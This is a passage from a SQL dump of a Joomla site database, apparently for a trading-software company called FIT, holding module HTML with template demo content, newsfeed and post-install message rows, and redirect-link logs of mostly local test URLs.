class=\"width-25\">\r\n<div class=\"block\"><img src=\"images/pages/team/img6.jpg\" alt=\"\" />\r\n<h3>Edinson Cavani</h3>\r\n<h4>Graphic Designer</h4>\r\n<div class=\"social-links\"> </div>\r\n</div>\r\n</div>\r\n<div class=\"width-25\">\r\n<div class=\"block\"><img src=\"images/pages/team/img7.jpg\" alt=\"\" />\r\n<h3>Radamel Falcao</h3>\r\n<h4>Intern. Developer</h4>\r\n<div class=\"social-links\"> </div>\r\n</div>\r\n</div>',1,'bottom-1',736,'2015-03-12 11:19:35','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"align-center team team-polaroid bigmargin-top\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(286,256,'NEWS & EVENTS','','<div id=\"testimonialCarousel\" class=\"carousel slide\" data-pause=\"hover\"><!-- Carousel items -->\r\n<div class=\"carousel-inner\">\r\n<div class=\"active item\">\r\n<div class=\"clearfix width-50\"><img class=\"pull-left\" src=\"images/news.jpg\" alt=\"\" />\r\n<h4>FIT- PROVIDES SICO UAE WITH BROKERAGE TRADING</h4>\r\n<h4>PLATFORM</h4>\r\n<p class=\"testimonial-text\">FIT is pleased to announce that, FIT has successfully implemented the FIT Trading Platform for Securities & Investment Company United </p>\r\n</div>\r\n<div class=\"clearfix width-50\"><img class=\"pull-left\" src=\"images/news.jpg\" alt=\"\" />\r\n<h4>ESCA accredits FIT Margin Trading</h4>\r\n<h4>Module</h4>\r\n<p class=\"testimonial-text\">FIT is proud to announce that, Al-Ramz Securities – a leading Brokerage firm in UAE, Regulated by ESCA, has been</p>\r\n</div>\r\n</div>\r\n<div class=\"item\">\r\n<div class=\"clearfix width-50\"><img class=\"pull-left\" src=\"images/news.jpg\" alt=\"\" />\r\n<h4>CNBC Arabia uses BORSAT system</h4>\r\n<p class=\"testimonial-text\">CNBC Arabia and Securities & Commodities Authority (SCA) launched an awareness program called Al Mahfaza</p>\r\n<p class=\"testimonial-text\"> </p>\r\n</div>\r\n<div class=\"clearfix width-50\"> </div>\r\n</div>\r\n</div>\r\n<!-- Carousel nav --> <a class=\"carousel-control left\" href=\"#testimonialCarousel\" data-slide=\"prev\">‹</a> <a class=\"carousel-control right\" href=\"#testimonialCarousel\" data-slide=\"next\">›</a></div>',1,'mainbottom-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"testimonial align-center bigmargin-top\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(287,243,'Easy Styling','','<div class=\"align-center\">\r\n<h1>Well structured and very semantic code</h1>\r\n<h2>Very semantic markup for search engine optimization</h2>\r\n</div>\r\n<div class=\"width-50\">\r\n<h3>With the help of bootstrap Expose delivers a simple, flexible, reusable fixed grid system layout</h3>\r\n<p>Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. Separated they live in Bookmarksgrove right at the coast of the Semantics, a large language ocean. A small river named Duden flows by their place and supplies it with the necessary regelialia. It is a paradisematic country, in which roasted parts of sentences fly into your mouth.</p>\r\n</div>\r\n<div class=\"width-50\"><img src=\"images/demo-contents/styling.png\" alt=\"\" /></div>',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(288,247,'our partner','Team polaroid on About us Page 1','<div class=\"width-25\">\r\n<div class=\"block\"><img src=\"images/Capture1.PNG\" alt=\"\" />\r\n<h3>ORACLE</h3>\r\n<div class=\"social-links\"> </div>\r\n</div>\r\n</div>\r\n<div class=\"width-25\">\r\n<div class=\"block\"><img src=\"images/Capture.PNG\" alt=\"\" />\r\n<h3>Builders Solutions</h3>\r\n<div class=\"social-links\"> </div>\r\n</div>\r\n</div>\r\n<div class=\"width-25\">\r\n<div class=\"block\"><img src=\"images/Capture2.PNG\" alt=\"\" />\r\n<h3>Web Masters</h3>\r\n<div class=\"social-links\"> </div>\r\n</div>\r\n</div>\r\n<div class=\"width-25\">\r\n<div class=\"block\"><img src=\"images/Capture4.PNG\" alt=\"\" />\r\n<div class=\"social-links\"> </div>\r\n</div>\r\n</div>\r\n<div class=\"width-25\">\r\n<div class=\"block\"><img src=\"images/Capture3.PNG\" alt=\"\" />\r\n<h3>JAVNA</h3>\r\n<div class=\"social-links\"> </div>\r\n</div>\r\n</div>',1,'contentbottom-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"align-center team team-polaroid\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(289,248,'partner','Team polaroid on About us Page 1','<div class=\"width-25\">\r\n<div class=\"block\"><img src=\"images/pages/team/img4.jpg\" alt=\"\" />\r\n<h3>Wayne Rooney</h3>\r\n<h4>CTO</h4>\r\n<div class=\"social-links\"> </div>\r\n</div>\r\n</div>\r\n<div class=\"width-25\">\r\n<div class=\"block\"><img src=\"images/pages/team/img5.jpg\" alt=\"\" />\r\n<h3>Zlatan Ibrahimović</h3>\r\n<h4>Front End Engineer</h4>\r\n<div class=\"social-links\"> </div>\r\n</div>\r\n</div>\r\n<div class=\"width-25\">\r\n<div class=\"block\"><img src=\"images/pages/team/img6.jpg\" alt=\"\" />\r\n<h3>Edinson Cavani</h3>\r\n<h4>Graphic Designer</h4>\r\n<div class=\"social-links\"> </div>\r\n</div>\r\n</div>\r\n<div class=\"width-25\">\r\n<div class=\"block\"><img src=\"images/pages/team/img7.jpg\" alt=\"\" />\r\n<h3>Radamel Falcao</h3>\r\n<h4>Intern. Developer</h4>\r\n<div class=\"social-links\"> </div>\r\n</div>\r\n</div>',1,'contentbottom-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"align-center team team-polaroid\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'); /*!40000 ALTER TABLE `fit_modules` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_modules_menu` -- DROP TABLE IF EXISTS `fit_modules_menu`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_modules_menu` ( `moduleid` int(11) NOT NULL default '0', `menuid` int(11) NOT NULL default '0', PRIMARY KEY (`moduleid`,`menuid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_modules_menu` -- LOCK TABLES `fit_modules_menu` WRITE; /*!40000 ALTER TABLE `fit_modules_menu` DISABLE KEYS */; INSERT INTO `fit_modules_menu` VALUES (2,0),(3,0),(4,0),(6,0),(7,0),(8,0),(9,0),(10,0),(12,0),(13,0),(14,0),(15,0),(19,-463),(19,-462),(19,-433),(19,-432),(19,-431),(19,-430),(19,-429),(19,-427),(19,-400),(19,-399),(19,-296),(19,-244),(19,-243),(19,-242),(19,-234),(22,231),(22,234),(22,238),(22,242),(22,243),(22,244),(22,296),(22,399),(22,400),(23,-463),(23,-462),(23,-433),(23,-432),(23,-431),(23,-430),(23,-429),(23,-427),(23,-400),(23,-399),(23,-296),(23,-244),(23,-243),(23,-242),(23,-238),(23,-234),(44,0),(45,512),(45,518),(45,519),(52,-582),(52,-576),(52,-571),(52,-570),(52,-435),(57,238),(57,427),(57,429),(57,430),(57,431),(57,432),(57,433),(57,462),(57,463),(71,285),(71,316),(114,0),(125,0),(128,0),(129,0),(130,0),(131,0),(153,467),(161,467),(162,467),(165,467),(166,467),(168,467),(176,0),(177,435),(178,435),(179,435),(181,435),(182,469),(182,512),(182,518),(182,519),(182,636),(183,469),(183,492),(183,518),(184,467),(185,467),(186,467),(187,467),(193,207),(193,444),(193,464),(193,467),(196,467),(197,467),(198,469),(198,492),(199,469),(199,492),(200,467),(202,466),(202,555),(202,556),(202,557),(202,558),(202,559),(202,560),(202,561),(202,562),(202,563),(202,564),(203,466),(203,555),(203,556),(203,557),(203,558),(203,559),(203,560),(203,561),(203,562),(203,563),(203,564),(205,512),(205,518),(205,636),(206,0),(207,0),(208,0),(209,0),(210,467),(211,467),(212,467),(213,467),(214,467),(215,467),(216,467),(217,469),(217,492),(218,469),(218,492),(219,207),(219,444),(219,464),(219,492),(219,555),(219,556),(219,557),(219,558),(219,559),(219,560),(219,561),(219,562),(219,563),(219,564),(220,0),(221,566),(222,566),(222,567),(223,566),(224,566),(225,616),(228,568),(229,616),(230,566),(231,616),(234,570),(235,570),(236,570),(237,570),(238,570),(239,570),(240,571),(241,571),(242,619),(243,574),(244,619),(245,619),(246,575),(247,576),(248,576),(249,576),(250,576),(254,582),(255,582),(256,582),(257,582),(258,583),(260,435),(260,570),(262,435),(264,435),(265,435),(266,435),(266,570),(267,0),(268,0),(269,0),(270,435),(271,435),(272,207),(272,435),(272,444),(272,464),(272,555),(272,556),(272,557),(272,558),(272,559),(272,560),(272,561),(272,562),(272,563),(272,564),(273,435),(274,435),(275,435),(276,0),(277,0),(279,0),(280,0),(281,0),(282,0),(283,0),(284,681),(285,435),(285,616),(286,435),(286,582),(287,0),(288,675),(289,566); /*!40000 ALTER TABLE `fit_modules_menu` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_newsfeeds` -- DROP TABLE IF EXISTS `fit_newsfeeds`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_newsfeeds` ( `catid` int(11) NOT NULL default '0', `id` int(10) unsigned NOT NULL auto_increment, `name` varchar(100) NOT NULL default '', `alias` varchar(255) character set utf8 collate utf8_bin NOT NULL default '', `link` varchar(200) NOT NULL default '', `published` tinyint(1) NOT NULL default '0', `numarticles` int(10) unsigned NOT NULL default '1', `cache_time` int(10) unsigned NOT NULL default '3600', `checked_out` int(10) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `ordering` int(11) NOT NULL default '0', `rtl` tinyint(4) NOT NULL default '0', `access` int(10) unsigned default NULL, `language` char(7) NOT NULL default '', `params` text NOT NULL, `created` datetime NOT NULL default '0000-00-00 00:00:00', `created_by` int(10) unsigned NOT NULL default '0', `created_by_alias` varchar(255) NOT NULL default '', `modified` datetime NOT NULL default '0000-00-00 00:00:00', `modified_by` int(10) unsigned NOT NULL default '0', `metakey` text NOT NULL, `metadesc` text NOT NULL, `metadata` text NOT NULL, `xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.', `publish_up` datetime NOT NULL default '0000-00-00 00:00:00', `publish_down` datetime NOT NULL default '0000-00-00 00:00:00', `description` text NOT NULL, `version` int(10) unsigned NOT NULL default '1', `hits` int(10) unsigned NOT NULL default '0', `images` text NOT NULL, PRIMARY KEY (`id`), KEY `idx_access` (`access`), KEY `idx_checkout` (`checked_out`), KEY `idx_state` (`published`), KEY `idx_catid` (`catid`), KEY `idx_createdby` (`created_by`), KEY `idx_language` (`language`), KEY `idx_xreference` (`xreference`) ) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_newsfeeds` -- LOCK TABLES `fit_newsfeeds` WRITE; /*!40000 ALTER TABLE `fit_newsfeeds` DISABLE KEYS */; INSERT INTO `fit_newsfeeds` VALUES (17,1,'Joomla! Announcements','joomla-announcements','http://www.joomla.org/announcements.feed?type=rss',1,5,3600,0,'0000-00-00 00:00:00',1,0,1,'en-GB','{\"show_feed_image\":\"\",\"show_feed_description\":\"\",\"show_item_description\":\"\",\"feed_character_count\":\"0\"}','2011-01-01 00:00:01',736,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"author\":\"\",\"rights\":\"\"}','','0000-00-00 00:00:00','0000-00-00 00:00:00','',1,0,''),(17,2,'New Joomla! Extensions','new-joomla-extensions','http://feeds.joomla.org/JoomlaExtensions',1,5,3600,0,'0000-00-00 00:00:00',4,0,1,'en-GB','{\"show_feed_image\":\"\",\"show_feed_description\":\"\",\"show_item_description\":\"\",\"feed_character_count\":\"0\"}','2011-01-01 00:00:01',736,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"author\":\"\",\"rights\":\"\"}','','0000-00-00 00:00:00','0000-00-00 00:00:00','',1,0,''),(17,3,'Joomla! Security News','joomla-security-news','http://feeds.joomla.org/JoomlaSecurityNews',1,5,3600,0,'0000-00-00 00:00:00',2,0,1,'en-GB','{\"show_feed_image\":\"\",\"show_feed_description\":\"\",\"show_item_description\":\"\",\"feed_character_count\":\"0\"}','2011-01-01 00:00:01',736,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"author\":\"\",\"rights\":\"\"}','','0000-00-00 00:00:00','0000-00-00 00:00:00','',1,0,''),(17,4,'Joomla! Connect','joomla-connect','http://feeds.joomla.org/JoomlaConnect',1,5,3600,0,'0000-00-00 00:00:00',3,0,1,'en-GB','{\"show_feed_image\":\"\",\"show_feed_description\":\"\",\"show_item_description\":\"\",\"feed_character_count\":\"0\"}','2011-01-01 00:00:01',736,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"author\":\"\",\"rights\":\"\"}','','0000-00-00 00:00:00','0000-00-00 00:00:00','',1,0,''); /*!40000 ALTER TABLE `fit_newsfeeds` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_overrider` -- DROP TABLE IF EXISTS `fit_overrider`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_overrider` ( `id` int(10) NOT NULL auto_increment COMMENT 'Primary Key', `constant` varchar(255) NOT NULL, `string` text NOT NULL, `file` varchar(255) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_overrider` -- LOCK TABLES `fit_overrider` WRITE; /*!40000 ALTER TABLE `fit_overrider` DISABLE KEYS */; /*!40000 ALTER TABLE `fit_overrider` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_postinstall_messages` -- DROP TABLE IF EXISTS `fit_postinstall_messages`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_postinstall_messages` ( `postinstall_message_id` bigint(20) unsigned NOT NULL auto_increment, `extension_id` bigint(20) NOT NULL default '700' COMMENT 'FK to #__extensions', `title_key` varchar(255) NOT NULL default '' COMMENT 'Lang key for the title', `description_key` varchar(255) NOT NULL default '' COMMENT 'Lang key for description', `action_key` varchar(255) NOT NULL default '', `language_extension` varchar(255) NOT NULL default 'com_postinstall' COMMENT 'Extension holding lang keys', `language_client_id` tinyint(3) NOT NULL default '1', `type` varchar(10) NOT NULL default 'link' COMMENT 'Message type - message, link, action', `action_file` varchar(255) default '' COMMENT 'RAD URI to the PHP file containing action method', `action` varchar(255) default '' COMMENT 'Action method name or URL', `condition_file` varchar(255) default NULL COMMENT 'RAD URI to file holding display condition method', `condition_method` varchar(255) default NULL COMMENT 'Display condition method, must return boolean', `version_introduced` varchar(50) NOT NULL default '3.2.0' COMMENT 'Version when this message was introduced', `enabled` tinyint(3) NOT NULL default '1', PRIMARY KEY (`postinstall_message_id`) ) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_postinstall_messages` -- LOCK TABLES `fit_postinstall_messages` WRITE; /*!40000 ALTER TABLE `fit_postinstall_messages` DISABLE KEYS */; INSERT INTO `fit_postinstall_messages` VALUES (1,700,'PLG_TWOFACTORAUTH_TOTP_POSTINSTALL_TITLE','PLG_TWOFACTORAUTH_TOTP_POSTINSTALL_BODY','PLG_TWOFACTORAUTH_TOTP_POSTINSTALL_ACTION','plg_twofactorauth_totp',1,'action','site://plugins/twofactorauth/totp/postinstall/actions.php','twofactorauth_postinstall_action','site://plugins/twofactorauth/totp/postinstall/actions.php','twofactorauth_postinstall_condition','3.2.0',1),(2,700,'COM_CPANEL_MSG_EACCELERATOR_TITLE','COM_CPANEL_MSG_EACCELERATOR_BODY','COM_CPANEL_MSG_EACCELERATOR_BUTTON','com_cpanel',1,'action','admin://components/com_admin/postinstall/eaccelerator.php','admin_postinstall_eaccelerator_action','admin://components/com_admin/postinstall/eaccelerator.php','admin_postinstall_eaccelerator_condition','3.2.0',1),(3,700,'COM_CPANEL_MSG_PHPVERSION_TITLE','COM_CPANEL_MSG_PHPVERSION_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/phpversion.php','admin_postinstall_phpversion_condition','3.2.2',1); /*!40000 ALTER TABLE `fit_postinstall_messages` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_redirect_links` -- DROP TABLE IF EXISTS `fit_redirect_links`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_redirect_links` ( `id` int(10) unsigned NOT NULL auto_increment, `old_url` varchar(255) default NULL, `new_url` varchar(255) default NULL, `referer` varchar(150) NOT NULL, `comment` varchar(255) NOT NULL, `hits` int(10) unsigned NOT NULL default '0', `published` tinyint(4) NOT NULL, `created_date` datetime NOT NULL default '0000-00-00 00:00:00', `modified_date` datetime NOT NULL default '0000-00-00 00:00:00', PRIMARY KEY (`id`), UNIQUE KEY `idx_link_old` (`old_url`), KEY `idx_link_modifed` (`modified_date`) ) ENGINE=InnoDB AUTO_INCREMENT=402 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_redirect_links` -- LOCK TABLES `fit_redirect_links` WRITE; /*!40000 ALTER TABLE `fit_redirect_links` DISABLE KEYS */; INSERT INTO `fit_redirect_links` VALUES (1,'http://localhost/joomla/expose/index.php/using-joomla/extensions/components/users-component/index.php','','http://localhost/joomla/expose/index.php/using-joomla/extensions/components/users-component/password-reset','',0,0,'2011-03-24 07:31:49','0000-00-00 00:00:00'),(3,'http://localhost/joomla/expose/index.php/explore/features/error-page','','','',0,0,'2011-03-25 13:58:20','0000-00-00 00:00:00'),(4,'http://localhost/joomla/expose/index.php/index.php','','http://localhost/joomla/expose/index.php/login','',0,0,'2011-03-29 15:46:53','0000-00-00 00:00:00'),(5,'http://localhost/joomla/expose/index.php?Itemid=268','','http://localhost/joomla/expose/','',0,0,'2011-06-09 08:17:17','0000-00-00 00:00:00'),(6,'http://localhost:8888/joomla/expose/index.php?option=com_user','','','',0,0,'2012-01-26 11:34:28','0000-00-00 00:00:00'),(7,'http://localhost:8888/joomla/expose/index.php?option=com_user&view=login','','','',0,0,'2012-01-26 11:34:37','0000-00-00 00:00:00'),(8,'http://localhost:8888/joomla/expose/index.php?option=com_content&view=article&id=4900','','','',0,0,'2012-01-27 09:30:52','0000-00-00 00:00:00'),(9,'http://localhost:8888/joomla/expose/index.php?option=com_content&view=article&id=490&Itemid=466','','','',0,0,'2012-02-05 14:42:11','0000-00-00 00:00:00'),(10,'http://localhost:8888/joomla/expose/index.php?option=com_content&view=article&id=499&Itemid=466','','','',0,0,'2012-02-05 16:58:36','0000-00-00 00:00:00'),(11,'http://localhost:8888/templates/infinity/index.php/component/content/?&Itemid=101&style=page','','','',0,0,'2012-03-29 17:38:38','0000-00-00 00:00:00'),(12,'http://localhost:8888/joomla/expose/index.php?option=com_content&view=article&id=90','','','',0,0,'2012-07-13 10:59:12','0000-00-00 00:00:00'),(13,'http://localhost:8888/joomla/expose/index.php?option=com_content&view=article&id=90&Itemid=552','','http://localhost:8888/joomla/expose/','',1,0,'2012-07-13 10:59:44','0000-00-00 00:00:00'),(14,'http://localhost/joomla/expose/index.php?option=com_content&view=article&id=90&Itemid=552','','http://localhost/joomla/expose/index.php?option=com_content&view=article&id=72&Itemid=490','',1,0,'2013-09-14 19:17:25','0000-00-00 00:00:00'),(15,'http://localhost/pages/index.php/2013-12-09-05-09-08/index.php','','http://localhost/pages/index.php/2013-12-09-05-09-08/about-us','',3,0,'2013-12-09 05:26:10','0000-00-00 00:00:00'),(16,'http://localhost/pages/index.php/2013-12-09-05-09-08/about-us','','http://localhost/pages/','',1,0,'2013-12-09 11:13:07','0000-00-00 00:00:00'),(17,'http://localhost/pages/index.php/pages/about-us','','http://localhost/pages/index.php/pages/meet-the-team','',1,0,'2013-12-10 06:45:41','0000-00-00 00:00:00'),(18,'http://localhost/pages/index.php/single-contact','','http://localhost/pages/','',2,0,'2013-12-12 05:21:32','0000-00-00 00:00:00'),(19,'http://localhost/pages/index.php/pages/index.php','','http://localhost/pages/index.php/pages/contact-us-page-2','',1,0,'2013-12-13 15:08:40','0000-00-00 00:00:00'),(20,'http://192.168.1.2/appy/index.php/pages/2013-12-19-05-49-40/undefined?1390903847410','','http://192.168.1.2/appy/index.php/pages/2013-12-19-05-49-40/xpert-slider','',1,0,'2014-01-28 10:10:48','0000-00-00 00:00:00'),(21,'http://192.168.1.2/appy/index.php/pages/undefined?1390903889213','','http://192.168.1.2/appy/index.php/pages/about-us-page-1','',1,0,'2014-01-28 10:11:29','0000-00-00 00:00:00'),(22,'http://localhost/appy/index.php/pages/undefined?1391491996089','','http://localhost/appy/index.php/pages/about-us-page-1','',1,0,'2014-02-04 05:33:17','0000-00-00 00:00:00'),(23,'http://localhost/appy/index.php/pages/undefined?1391492049512','','http://localhost/appy/index.php/pages/about-us-page-2','',1,0,'2014-02-04 05:34:10','0000-00-00 00:00:00'),(24,'http://localhost/appy/index.php/pages/2013-12-19-05-49-40/undefined?1391492465533','','http://localhost/appy/index.php/pages/2013-12-19-05-49-40/xpert-slider','',1,0,'2014-02-04 05:41:06','0000-00-00 00:00:00'),(25,'http://localhost/appy/index.php/pages/undefined?1391661113891','','http://localhost/appy/index.php/pages/about-us-page-1','',1,0,'2014-02-06 04:31:55','0000-00-00 00:00:00'),(26,'http://localhost/appy/index.php/pages/undefined?1391661251869','','http://localhost/appy/index.php/pages/about-us-page-1','',1,0,'2014-02-06 04:34:13','0000-00-00 00:00:00'),(27,'http://localhost/appy/index.php/pages/undefined?1391661417870','','http://localhost/appy/index.php/pages/about-us-page-1','',1,0,'2014-02-06 04:36:59','0000-00-00 00:00:00'),(28,'http://localhost/appy/index.php/pages/undefined?1391661448917','','http://localhost/appy/index.php/pages/about-us-page-1','',1,0,'2014-02-06 04:37:30','0000-00-00 00:00:00'),(29,'http://localhost/appy/index.php/pages/undefined?1391662012548','','http://localhost/appy/index.php/pages/about-us-page-1','',1,0,'2014-02-06 04:46:53','0000-00-00 00:00:00'),(30,'http://localhost/appy/index.php/pages/undefined?1391664078793','','http://localhost/appy/index.php/pages/about-us-page-1','',1,0,'2014-02-06 05:21:19','0000-00-00 00:00:00'),(31,'http://localhost/appy/index.php/pages/undefined?1391664125138','','http://localhost/appy/index.php/pages/about-us-page-2','',1,0,'2014-02-06 05:22:06','0000-00-00 00:00:00'),(32,'http://localhost/appy/index.php/pages/undefined?1391664199359','','http://localhost/appy/index.php/pages/about-us-page-1','',2,0,'2014-02-06 05:23:20','0000-00-00 00:00:00'),(33,'http://localhost/appy/index.php/pages/undefined?1391665226063','','http://localhost/appy/index.php/pages/about-us-page-1','',1,0,'2014-02-06 05:40:27','0000-00-00 00:00:00'),(34,'http://localhost/appy/index.php/pages/undefined?1391665264111','','http://localhost/appy/index.php/pages/about-us-page-2','',1,0,'2014-02-06 05:41:05','0000-00-00 00:00:00'),(35,'http://localhost/appy/index.php/pages/2013-12-19-05-49-40/undefined?1391667904821','','http://localhost/appy/index.php/pages/2013-12-19-05-49-40/xpert-slider','',1,0,'2014-02-06 06:25:06','0000-00-00 00:00:00'),(36,'http://localhost/appy/index.php/pages/coming-soon-page','','http://localhost/appy/','',1,0,'2014-02-06 06:31:59','0000-00-00 00:00:00'),(37,'http://localhost/appy/index.php/pages/2013-12-19-05-49-40/undefined?1391668565235','','http://localhost/appy/index.php/pages/2013-12-19-05-49-40/xpert-slider','',1,0,'2014-02-06 06:36:06','0000-00-00 00:00:00'),(38,'http://localhost/appy/index.php/pages/undefined?1391669398640','','http://localhost/appy/index.php/pages/about-us-page-1','',1,0,'2014-02-06 06:49:59','0000-00-00 00:00:00'),(39,'http://localhost/appy/index.php/pages/undefined?1391669473690','','http://localhost/appy/index.php/pages/about-us-page-1','',1,0,'2014-02-06 06:51:14','0000-00-00 00:00:00'),(40,'http://localhost/appy/index.php/pages/2013-12-19-05-49-40/undefined?1391669963990','','http://localhost/appy/index.php/pages/2013-12-19-05-49-40/xpert-slider','',1,0,'2014-02-06 06:59:25','0000-00-00 00:00:00'),(41,'http://localhost/appy/index.php/pages/undefined?1391672313278','','http://localhost/appy/index.php/pages/about-us-page-1','',1,0,'2014-02-06 07:38:34','0000-00-00 00:00:00'),(42,'http://localhost/appy/index.php/pages/service-page-1','','http://localhost/appy/index.php/pages/pricing-table','',1,0,'2014-02-06 08:19:09','0000-00-00 00:00:00'),(43,'http://localhost/appy/index.php/pages/','','','',1,0,'2014-02-06 08:19:13','0000-00-00 00:00:00'),(44,'http://localhost/appy/index.php/pages/pricing-table','','http://localhost/appy/index.php/pages/service-page','',1,0,'2014-02-06 08:20:03','0000-00-00 00:00:00'),(45,'http://localhost/appy/index.php/pages/undefined?1391679327346','','http://localhost/appy/index.php/pages/about-us-page-1','',1,0,'2014-02-06 09:35:28','0000-00-00 00:00:00'),(46,'http://localhost/appy/index.php/pages/undefined?1391679423639','','http://localhost/appy/index.php/pages/about-us-page-1','',1,0,'2014-02-06 09:37:04','0000-00-00 00:00:00'),(47,'http://localhost/appy/index.php/pages/undefined?1391679585581','','http://localhost/appy/index.php/pages/about-us-page-1','',1,0,'2014-02-06 09:39:46','0000-00-00 00:00:00'),(48,'http://localhost/appy/index.php/pages/undefined?1391681314600','','http://localhost/appy/index.php/pages/about-us-page-1','',1,0,'2014-02-06 10:08:35','0000-00-00 00:00:00'),(49,'http://localhost/appy/index.php/pages/undefined?1391681435672','','http://localhost/appy/index.php/pages/about-us-page-1','',1,0,'2014-02-06 10:10:36','0000-00-00 00:00:00'),(50,'http://192.168.1.5/appy/index.php/pages/undefined?1391762605119','','http://192.168.1.5/appy/index.php/pages/about-us-page-1','',1,0,'2014-02-07 08:43:26','0000-00-00 00:00:00'),(51,'http://localhost/appy/index.php/pages/undefined?1391762617921','','http://localhost/appy/index.php/pages/about-us-page-1','',1,0,'2014-02-07 08:43:39','0000-00-00 00:00:00'),(52,'http://192.168.1.5/appy/index.php/pages/undefined?1391762625150','','http://192.168.1.5/appy/index.php/pages/about-us-page-2','',1,0,'2014-02-07 08:43:46','0000-00-00 00:00:00'),(53,'http://192.168.1.5/appy/index.php/pages/2014-02-07-08-57-59/undefined?1392009574888','','http://192.168.1.5/appy/index.php/pages/2014-02-07-08-57-59/about-us-page-1','',1,0,'2014-02-10 05:19:34','0000-00-00 00:00:00'),(54,'http://192.168.1.5/appy/index.php/pages/2014-02-07-08-57-59/undefined?1392009577540','','http://192.168.1.5/appy/index.php/pages/2014-02-07-08-57-59/about-us-page-2','',1,0,'2014-02-10 05:19:37','0000-00-00 00:00:00'),(55,'http://localhost/zenith2/index.php/pages/2014-02-07-08-57-59/undefined?1395662342573','','http://localhost/zenith2/index.php/pages/2014-02-07-08-57-59/about-us-page-1','',1,0,'2014-03-24 11:59:03','0000-00-00 00:00:00'),(56,'http://localhost/zenith2/index.php/pages/2014-02-07-08-57-59/undefined?1397207727565','','http://localhost/zenith2/index.php/pages/2014-02-07-08-57-59/about-us-page-1','',1,0,'2014-04-11 09:15:28','0000-00-00 00:00:00'),(57,'http://localhost/zenith2/index.php/easyblog','','http://localhost/zenith2/index.php/easyblog/teamblog','',1,0,'2014-04-11 10:32:55','0000-00-00 00:00:00'),(58,'http://localhost/zenith2/index.php/pages/2014-02-07-08-57-59/undefined?1397212910569','','http://localhost/zenith2/index.php/pages/2014-02-07-08-57-59/about-us-page-1','',1,0,'2014-04-11 10:41:51','0000-00-00 00:00:00'),(59,'http://localhost/zenith2/index.php/pages/2014-02-07-08-57-59/about-us-page-2','','http://localhost/zenith2/index.php/pages/2014-02-07-08-57-59/about-us-page-1','',1,0,'2014-04-11 10:50:58','0000-00-00 00:00:00'),(60,'http://www.fitoman.com/index.php?option=com_content&view=category&id=65&Itemid=144','','','',24,0,'2015-03-12 00:24:31','0000-00-00 00:00:00'),(61,'http://www.fitoman.com/index.php?option=com_content&view=article&id=294:wed-march-15&catid=62:news-a-events&Itemid=153','','','',15,0,'2015-03-12 00:24:50','0000-00-00 